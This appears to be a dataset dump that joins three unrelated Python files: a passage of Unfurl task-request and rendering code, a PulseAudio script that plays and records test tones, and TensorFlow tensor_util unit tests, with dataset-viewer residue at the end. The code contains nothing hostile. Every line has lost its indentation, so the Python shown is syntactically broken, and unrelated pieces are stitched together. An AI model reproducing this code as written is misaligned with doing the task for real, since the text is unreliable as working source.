# don't consider requests in the same root
continue
previous = root
yield root or r
def set_fulfilled(requests, completed):
# requests, completed are top level requests,
# as is future_dependencies
ready, notReady = [], []
for req in requests:
if req.update_future_dependencies(completed):
notReady.append(req)
else: # list is now empty so request is ready
ready.append(req)
return ready, notReady
def _prepare_request(job, req, errors):
# req is a taskrequests, future_requests are (grouprequest, taskrequest) pairs
if req.task:
task = req.task
task._attributeManager.attributes = {}
task.target.root.attributeManager = task._attributeManager
else:
task = req.task = job.create_task(req.configSpec, req.target, reason=req.reason)
error = None
try:
proceed, msg = job.should_run_task(task)
if not proceed:
req.required = False
if task._errors:
error = task._errors[0]
logger.debug(
"skipping task %s for instance %s with state %s and status %s: %s",
req.configSpec.operation,
req.target.name,
req.target.state,
req.target.status,
msg,
)
except Exception:
proceed = False
# note: failed rendering may be re-tried later if it has dependencies
error = UnfurlTaskError(task, "should_run_task failed", logging.DEBUG)
if error:
task._inputs = None
task._attributeManager.attributes = {} # rollback changes
errors.append(error)
else:
task.commit_changes()
return proceed
def _render_request(job, parent, req, requests):
# req is a taskrequests, future_requests are (grouprequest, taskrequest) pairs
assert req.task
task = req.task
task._attributeManager.attributes = {}
task.target.root.attributeManager = task._attributeManager
error = None
try:
task.logger.debug("rendering %s %s", task.target.name, task.name)
task.rendered = task.configurator.render(task)
except Exception:
# note: failed rendering may be re-tried later if it has dependencies
error = UnfurlTaskError(task, "Configurator render failed", logging.DEBUG)
if parent and parent.workflow == "undeploy":
# when removing an instance don't worry about depending values changing in the future
deps = []
else:
# key => (instance, list<attribute>)
liveDependencies = task._attributeManager.find_live_dependencies()
# a future request may change the value of these attributes
deps = list(_get_deps(parent, req, liveDependencies, requests))
if deps:
req.future_dependencies = deps
task.logger.debug(
"%s:%s can not render yet, depends on %s",
task.target.name,
req.configSpec.operation,
str(deps),
)
# rollback changes:
task._errors = []
task._inputs = None
task._attributeManager.attributes = {}
task.discard_work_folders()
return deps, None
elif error:
task.fail_work_folders()
task._inputs = None
task._attributeManager.attributes = {} # rollback changes
else:
task.commit_changes()
return deps, error
def _add_to_req_list(reqs, parent, request):
if parent: # only add if we haven't already
if not reqs or reqs[-1] is not parent:
reqs.append(parent)
else:
reqs.append(request)
def do_render_requests(job, requests):
ready, notReady, errors = [], [], []
flattened_requests = list(
(p, r)
for (p, r) in get_render_requests(requests)
if _prepare_request(job, r, errors)
)
render_requests = collections.deque(flattened_requests)
while render_requests:
parent, request = render_requests.popleft()
deps, error = _render_request(job, parent, request, flattened_requests)
if error:
errors.append(error)
if deps:
# remove if we already added the parent
if parent and ready and ready[-1] is parent:
ready.pop()
_add_to_req_list(notReady, parent, request)
elif not parent or not notReady or notReady[-1] is not parent:
# don't add if the parent was placed on the notReady list
_add_to_req_list(ready, parent, request)
return ready, notReady, errors
def _filter_config(opts, config, target):
if opts.readonly and config.workflow != "discover":
return None, "read only"
if opts.requiredOnly and not config.required:
return None, "required"
if opts.instance and target.name != opts.instance:
return None, f"instance {opts.instance}"
if opts.instances and target.name not in opts.instances:
return None, f"instances {opts.instances}"
return config, None
def filter_task_request(jobOptions, req):
configSpec = req.configSpec
configSpecName = configSpec.name
configSpec, filterReason = _filter_config(jobOptions, configSpec, req.target)
if not configSpec:
logger.debug(
"skipping configspec '%s' for '%s': doesn't match filter: '%s'",
configSpecName,
req.target.name,
filterReason,
)
return None # treat as filtered step
return req
def _find_implementation(interface, operation, template):
default = None
for iDef in template.get_interfaces():
if iDef.interfacename == interface or iDef.type == interface:
if iDef.name == operation:
return iDef
if iDef.name == "default":
default = iDef
return default
def find_resources_from_template_name(root, name):
# XXX make faster
for resource in root.get_self_and_descendents():
if resource.template.name == name:
yield resource
def find_parent_template(source):
for rel, req, reqDef in source.relationships:
# special case "host" so it can be declared without full set of relationship / capability types
if rel.type == "tosca.relationships.HostedOn" or "host" in req:
return rel.target
return None
def find_parent_resource(root, source):
parentTemplate = find_parent_template(source.toscaEntityTemplate)
if not parentTemplate:
return root
for parent in find_resources_from_template_name(root, parentTemplate.name):
# XXX need to evaluate matches
return parent
raise UnfurlError(f"could not find instance of template: {parentTemplate.name}")
def create_instance_from_spec(_manifest, target, rname, resourceSpec):
pname = resourceSpec.get("parent")
# get the actual parent if pname is a reserved name:
if pname in [".self", "SELF"]:
resourceSpec["parent"] = target.name
elif pname == "HOST":
resourceSpec["parent"] = target.parent.name if target.parent else "root"
if isinstance(resourceSpec.get("template"), dict):
# inline node template, add it to the spec
tname = resourceSpec["template"].pop("name", rname)
nodeSpec = _manifest.tosca.add_node_template(tname, resourceSpec["template"])
resourceSpec["template"] = nodeSpec.name
if resourceSpec.get("readyState") and "created" not in resourceSpec:
# setting "created" to the target's key indicates that
# the target is responsible for deletion
# if "created" is not defined, set it if readyState is set
resourceSpec["created"] = target.key
if "parent" not in resourceSpec and "template" in resourceSpec:
nodeSpec = _manifest.tosca.get_template(resourceSpec["template"])
parent = find_parent_resource(target.root, nodeSpec)
else:
parent = target.root
# note: if resourceSpec[parent] is set it overrides the parent keyword
return _manifest.create_node_instance(rname, resourceSpec, parent=parent)
def create_task_request(
jobOptions,
operation,
resource,
reason=None,
inputs=None,
startState=None,
operation_host=None,
skip_filter=False,
):
"""implementation can either be a named artifact (including a python configurator class),
or a file path"""
interface, sep, action = operation.rpartition(".")
iDef = _find_implementation(interface, action, resource.template)
if iDef and iDef.name != "default":
# merge inputs
if inputs:
inputs = dict(iDef.inputs, **inputs)
else:
inputs = iDef.inputs or {}
kw = _get_config_spec_args_from_implementation(
iDef, inputs, resource, operation_host
)
else:
kw = None
if kw:
kw["interface"] = interface
if reason:
name = f"for {reason}: {interface}.{action}"
if reason == jobOptions.workflow:
# set the task's workflow instead of using the default ("deploy")
kw["workflow"] = reason
else:
name = f"{interface}.{action}"
configSpec = ConfigurationSpec(name, action, **kw)
logger.debug(
"creating configuration %s with %s to run for %s: %s",
configSpec.name,
configSpec.inputs,
resource.name,
reason or action,
)
else:
errorMsg = f'unable to find an implementation for operation "{action}" on node "{resource.template.name}"'
logger.debug(errorMsg)
return None
req = TaskRequest(
configSpec,
resource,
reason or action,
startState=startState,
)
if skip_filter:
return req
else:
return filter_task_request(jobOptions, req)
def _set_default_command(kw, implementation, inputs):
# is it a shell script or a command line?
shell = inputs.get("shell")
if shell is None:
# no special shell characters
shell = not re.match(r"[\w.-]+\Z", implementation)
operation_host = kw.get("operation_host")
implementation = implementation.lstrip()
if not operation_host or operation_host == "localhost":
className = "unfurl.configurators.shell.ShellConfigurator"
if shell:
shellArgs = dict(command=implementation)
else:
shellArgs = dict(command=[implementation])
else:
className = "unfurl.configurators.ansible.AnsibleConfigurator"
module = "shell" if shell else "command"
playbookTask = dict(cmd=implementation)
cwd = inputs.get("cwd")
if cwd:
playbookTask["chdir"] = cwd
if shell and isinstance(shell, six.string_types):
playbookTask["executable"] = shell
shellArgs = dict(playbook=[{module: playbookTask}])
kw["className"] = className
if inputs:
shellArgs.update(inputs)
kw["inputs"] = shellArgs
def _set_classname(kw, artifact, inputs):
if not artifact: # malformed implementation
return None
implementation = artifact.file
className = artifact.properties.get("className")
if className:
kw["className"] = className
return kw
# see if implementation looks like a python class
if "#" in implementation and len(shlex.split(implementation)) == 1:
path, fragment = artifact.get_path_and_fragment()
mod = load_module(path)
kw["className"] = mod.__name__ + "." + fragment
return kw
elif lookup_class(implementation):
kw["className"] = implementation
return kw
# otherwise assume it's a shell command line
logger.debug("interpreting 'implementation' as a shell command: %s", implementation)
_set_default_command(kw, implementation, inputs)
return kw
def _get_config_spec_args_from_implementation(iDef, inputs, target, operation_host):
implementation = iDef.implementation
kw = dict(inputs=inputs, outputs=iDef.outputs, operation_host=operation_host)
configSpecArgs = ConfigurationSpec.getDefaults()
artifactTpl = None
dependencies = None
if isinstance(implementation, dict):
# operation_instance = find_operation_host(
# target, implementation.get("operation_host") or operation_host
# )
for name, value in implementation.items():
if name == "primary":
artifactTpl = value
elif name == "dependencies":
dependencies = value
elif name in configSpecArgs:
# sets operation_host, environment, timeout
kw[name] = value
else:
# "either because it refers to a named artifact specified in the artifacts section of a type or template,
# or because it represents the name of a script in the CSAR file that contains the definition."
artifactTpl = implementation
# operation_instance = find_operation_host(target, operation_host)
# if not operation_instance:
# operation_instance = operation_instance or target.root
base_dir = getattr(iDef.value, "base_dir", iDef._source)
if artifactTpl:
artifact = target.template.find_or_create_artifact(artifactTpl, base_dir)
else:
artifact = None
kw["primary"] = artifact
if dependencies:
kw["dependencies"] = [
target.template.find_or_create_artifact(artifactTpl, base_dir)
for artifactTpl in dependencies
]
if "className" not in kw:
return _set_classname(kw, artifact, inputs)
return kw
|
the-stack_106_16989
|
import configparser
import numpy as np
import os
import subprocess
import time
from scipy.io import wavfile
CFG_FILE = os.path.join(os.environ['HOME'], 'soundcard.cfg')
WAV_FILE_OUT = '/tmp/out.wav'
WAV_FILE_IN = '/tmp/in.wav'
SAMPLE_RATE = 44100
BIT_DEPTH = np.int16
WAV_FORMAT = 's16ne'
VOL_PLAY = 2 ** 16 - 1
DURATION_RECORD = 2
PAUSE_PRE_PLAY = 2
PAUSE_PRE_RECORD = 2
PAUSE_POST_RECORD = 2
DURATION_PLAY = DURATION_RECORD + PAUSE_PRE_RECORD + PAUSE_POST_RECORD
config = configparser.ConfigParser()
config.read(CFG_FILE)
PA_SINK = config.get('SOUNDCARD', 'PA_SINK', fallback='')
PA_SOURCE = config.get('SOUNDCARD', 'PA_SOURCE', fallback='')
VOL_RECORD = config.getint('SOUNDCARD', 'VOL_RECORD', fallback=-1)
if PA_SINK == '' or PA_SOURCE == '' or VOL_RECORD == -1:
config['SOUNDCARD'] = {'PA_SINK': PA_SINK, 'PA_SOURCE': PA_SOURCE, 'VOL_RECORD': VOL_RECORD}
with open(CFG_FILE, 'w') as cfg:
config.write(cfg)
if PA_SINK == '' or PA_SOURCE == '':
raise ValueError(f'PA_SINK or PA_SOURCE are not set! Specify PulseAudio devices in {CFG_FILE}')
def sine_wave(frequency=440):
time_points = np.linspace(0, DURATION_PLAY, SAMPLE_RATE * DURATION_PLAY)
return np.iinfo(BIT_DEPTH).max * np.sin(frequency * 2 * np.pi * time_points)
def white_noise():
return np.random.uniform(np.iinfo(BIT_DEPTH).min, np.iinfo(BIT_DEPTH).max, SAMPLE_RATE * DURATION_PLAY)
def is_waveform_clipped(waveform):
clipped_top = np.max(waveform) >= np.iinfo(BIT_DEPTH).max
clipped_bottom = np.min(waveform) <= np.iinfo(BIT_DEPTH).min
return clipped_top or clipped_bottom
def write_waveform(waveform):
if os.path.exists(WAV_FILE_OUT):
os.remove(WAV_FILE_OUT)
wavfile.write(WAV_FILE_OUT, SAMPLE_RATE, np.hstack((waveform, waveform)).astype(BIT_DEPTH))
def play_wav():
subprocess.Popen(['pacmd', 'set-sink-volume', PA_SINK, '0'])
subprocess.Popen(['pacmd', 'set-sink-volume', PA_SINK, f'{int(VOL_PLAY)}'])
subprocess.Popen(['paplay', WAV_FILE_OUT, f'--device={PA_SINK}'])
def record_wav():
if VOL_RECORD == -1:
raise ValueError('VOL_RECORD parameter is not set! Use gain_tune.py to configure recording gain')
if os.path.exists(WAV_FILE_IN):
os.remove(WAV_FILE_IN)
subprocess.Popen(['pacmd', 'set-source-volume', PA_SOURCE, '0'])
subprocess.Popen(['pacmd', 'set-source-volume', PA_SOURCE, f'{int(VOL_RECORD)}'])
subprocess.Popen(
[
'parecord',
f'--device={PA_SOURCE}',
f'--rate={SAMPLE_RATE}',
f'--format={WAV_FORMAT}',
'--channels=2',
f'--process-time-msec={DURATION_RECORD*1000}',
WAV_FILE_IN,
]
)
def read_waveform():
_, waveform = wavfile.read(WAV_FILE_IN)
return waveform
def play_and_record(waveform):
write_waveform(waveform)
time.sleep(PAUSE_PRE_PLAY)
play_wav()
time.sleep(PAUSE_PRE_RECORD)
record_wav()
time.sleep(DURATION_RECORD)
subprocess.Popen(['pkill', 'parecord'])
time.sleep(PAUSE_POST_RECORD)
new_waveform = read_waveform()
subprocess.Popen(['pkill', 'paplay'])
if is_waveform_clipped(new_waveform):
raise ValueError('Recorded waveform is clipped - reduce VOL_RECORD parameter')
new_waveform_L = new_waveform.astype('int')[:, 0]
new_waveform_R = new_waveform.astype('int')[:, 1]
return new_waveform_L, new_waveform_R
def rms(waveform):
return np.sqrt(np.mean(np.square(waveform)))
|
the-stack_106_16990
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""tensor_util tests."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import numpy as np
import tensorflow as tf
class FloatDTypeTest(tf.test.TestCase):
def test_assert_same_float_dtype(self):
self.assertIs(
tf.float32, tf.contrib.framework.assert_same_float_dtype(None, None))
self.assertIs(
tf.float32, tf.contrib.framework.assert_same_float_dtype([], None))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([], tf.float32))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype(None, tf.float32))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([None, None], None))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([None, None], tf.float32))
const_float = tf.constant(3.0, dtype=tf.float32)
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([const_float], tf.float32))
self.assertRaises(
ValueError,
tf.contrib.framework.assert_same_float_dtype, [const_float], tf.int32)
sparse_float = tf.SparseTensor(
tf.constant([[111], [232]], tf.int64),
tf.constant([23.4, -43.2], tf.float32),
tf.constant([500], tf.int64))
self.assertIs(tf.float32, tf.contrib.framework.assert_same_float_dtype(
[sparse_float], tf.float32))
self.assertRaises(
ValueError,
tf.contrib.framework.assert_same_float_dtype, [sparse_float], tf.int32)
self.assertRaises(
ValueError, tf.contrib.framework.assert_same_float_dtype,
[const_float, None, sparse_float], tf.float64)
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype(
[const_float, sparse_float]))
self.assertIs(tf.float32, tf.contrib.framework.assert_same_float_dtype(
[const_float, sparse_float], tf.float32))
const_int = tf.constant(3, dtype=tf.int32)
self.assertRaises(ValueError, tf.contrib.framework.assert_same_float_dtype,
[sparse_float, const_int])
self.assertRaises(ValueError, tf.contrib.framework.assert_same_float_dtype,
[sparse_float, const_int], tf.int32)
self.assertRaises(ValueError, tf.contrib.framework.assert_same_float_dtype,
[sparse_float, const_int], tf.float32)
self.assertRaises(
ValueError, tf.contrib.framework.assert_same_float_dtype, [const_int])
class AssertScalarIntTest(tf.test.TestCase):
def test_assert_scalar_int(self):
tf.contrib.framework.assert_scalar_int(tf.constant(3, dtype=tf.int32))
tf.contrib.framework.assert_scalar_int(tf.constant(3, dtype=tf.int64))
with self.assertRaisesRegexp(ValueError, "Unexpected type"):
tf.contrib.framework.assert_scalar_int(tf.constant(3, dtype=tf.float32))
with self.assertRaisesRegexp(ValueError, "Unexpected shape"):
tf.contrib.framework.assert_scalar_int(
tf.constant([3, 4], dtype=tf.int32))
class LocalVariabletest(tf.test.TestCase):
def test_local_variable(self):
with self.test_session() as sess:
self.assertEquals([], tf.local_variables())
value0 = 42
tf.contrib.framework.local_variable(value0)
value1 = 43
tf.contrib.framework.local_variable(value1)
variables = tf.local_variables()
self.assertEquals(2, len(variables))
self.assertRaises(tf.OpError, sess.run, variables)
tf.initialize_variables(variables).run()
self.assertAllEqual(set([value0, value1]), set(sess.run(variables)))
class ReduceSumNTest(tf.test.TestCase):
def test_reduce_sum_n(self):
with self.test_session():
a = tf.constant(1)
b = tf.constant([2])
c = tf.constant([[3, 4], [5, 6]])
self.assertEqual(21, tf.contrib.framework.reduce_sum_n([a, b, c]).eval())
class WithShapeTest(tf.test.TestCase):
def _assert_with_shape(
self, tensor, expected_value, expected_shape, unexpected_shapes):
for unexpected_shape in unexpected_shapes:
self.assertRaises(
ValueError, tf.contrib.framework.with_shape, unexpected_shape, tensor)
pattern = (
r"\[Wrong shape for %s \[expected\] \[actual\].\] \[%s\] \[%s\]" %
(tensor.name,
" ".join([str(dim) for dim in unexpected_shape]),
" ".join([str(dim) for dim in expected_shape])))
self.assertRaisesRegexp(
tf.OpError,
re.compile(pattern),
tf.contrib.framework.with_shape(
tf.constant(unexpected_shape), tensor).eval)
expected_placeholder = tf.placeholder(tf.float32)
self.assertRaisesRegexp(
tf.OpError,
re.compile(pattern),
tf.contrib.framework.with_same_shape(
expected_placeholder, tensor).eval, {
expected_placeholder: np.ones(unexpected_shape)
})
self.assertIs(tensor, tf.contrib.framework.with_shape(
expected_shape, tensor))
self.assertIs(tensor, tf.contrib.framework.with_same_shape(
tf.constant(1, shape=expected_shape), tensor))
tensor_with_shape = tf.contrib.framework.with_shape(
tf.constant(expected_shape), tensor)
np.testing.assert_array_equal(expected_value, tensor_with_shape.eval())
tensor_with_same_shape = tf.contrib.framework.with_same_shape(
expected_placeholder, tensor)
np.testing.assert_array_equal(expected_value, tensor_with_same_shape.eval({
expected_placeholder: np.ones(expected_shape)
}))
def test_with_shape_invalid_expected_shape(self):
with self.test_session():
self.assertRaisesRegexp(
ValueError, "Invalid rank", tf.contrib.framework.with_shape,
[[1], [2]], tf.constant(1.0))
def test_with_shape_invalid_type(self):
with self.test_session():
self.assertRaisesRegexp(
ValueError, "Invalid dtype", tf.contrib.framework.with_shape,
[1.1], tf.constant([1.0]))
self.assertRaisesRegexp(
ValueError, "Invalid dtype", tf.contrib.framework.with_shape,
np.array([1.1]), tf.constant(1.0))
self.assertRaisesRegexp(
ValueError, "Invalid dtype", tf.contrib.framework.with_shape,
tf.constant(np.array([1.1])), tf.constant(1.0))
def test_with_shape_0(self):
with self.test_session():
value = 42
shape = [0]
unexpected_shapes = [[1], [2], [1, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_1(self):
with self.test_session():
value = [42]
shape = [1]
unexpected_shapes = [[0], [2], [1, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_2(self):
with self.test_session():
value = [42, 43]
shape = [2]
unexpected_shapes = [[0], [1], [2, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_2x2(self):
with self.test_session():
value = [[42, 43], [44, 45]]
shape = [2, 2]
unexpected_shapes = [[0], [1], [2, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_none(self):
with self.test_session():
tensor_no_shape = tf.placeholder(tf.float32)
compatible_shape = [2, 2]
with_present_2x2 = tf.contrib.framework.with_shape(
compatible_shape, tensor_no_shape)
self.assertEquals(compatible_shape, with_present_2x2.get_shape().dims)
with_future_2x2 = tf.contrib.framework.with_shape(
tf.constant(compatible_shape), tensor_no_shape)
array_2x2 = [[42.0, 43.0], [44.0, 45.0]]
for tensor_2x2 in [with_present_2x2, with_future_2x2]:
np.testing.assert_array_equal(
array_2x2, tensor_2x2.eval({tensor_no_shape: array_2x2}))
self.assertRaisesRegexp(
tf.OpError, "Wrong shape", tensor_2x2.eval,
{tensor_no_shape: [42.0, 43.0]})
self.assertRaisesRegexp(
tf.OpError, "Wrong shape", tensor_2x2.eval,
{tensor_no_shape: [42.0]})
def test_with_shape_partial(self):
with self.test_session():
tensor_partial_shape = tf.placeholder(tf.float32)
tensor_partial_shape.set_shape([None, 2])
for incompatible_shape in [[0], [1]]:
self.assertRaisesRegexp(
ValueError, r"Shapes \(\?, 2\) and \([01],\) are not compatible",
tf.contrib.framework.with_shape,
incompatible_shape, tensor_partial_shape)
for incompatible_shape in [[1, 2, 1]]:
self.assertRaisesRegexp(
ValueError, "Incompatible shapes", tf.contrib.framework.with_shape,
incompatible_shape, tensor_partial_shape)
for incompatible_shape in [[2, 1]]:
self.assertRaisesRegexp(
ValueError, r"Shapes \(\?, 2\) and \(2, 1\) are not compatible",
tf.contrib.framework.with_shape,
incompatible_shape, tensor_partial_shape)
compatible_shape = [2, 2]
with_present_2x2 = tf.contrib.framework.with_shape(
compatible_shape, tensor_partial_shape)
self.assertEquals(compatible_shape, with_present_2x2.get_shape().dims)
with_future_2x2 = tf.contrib.framework.with_shape(
tf.constant(compatible_shape), tensor_partial_shape)
array_2x2 = [[42.0, 43.0], [44.0, 45.0]]
for tensor_2x2 in [with_present_2x2, with_future_2x2]:
np.testing.assert_array_equal(
array_2x2, tensor_2x2.eval({tensor_partial_shape: array_2x2}))
self.assertRaises(
ValueError, tensor_2x2.eval, {tensor_partial_shape: [42.0, 43.0]})
self.assertRaises(
ValueError, tensor_2x2.eval, {tensor_partial_shape: [42.0]})
if __name__ == "__main__":
tf.test.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.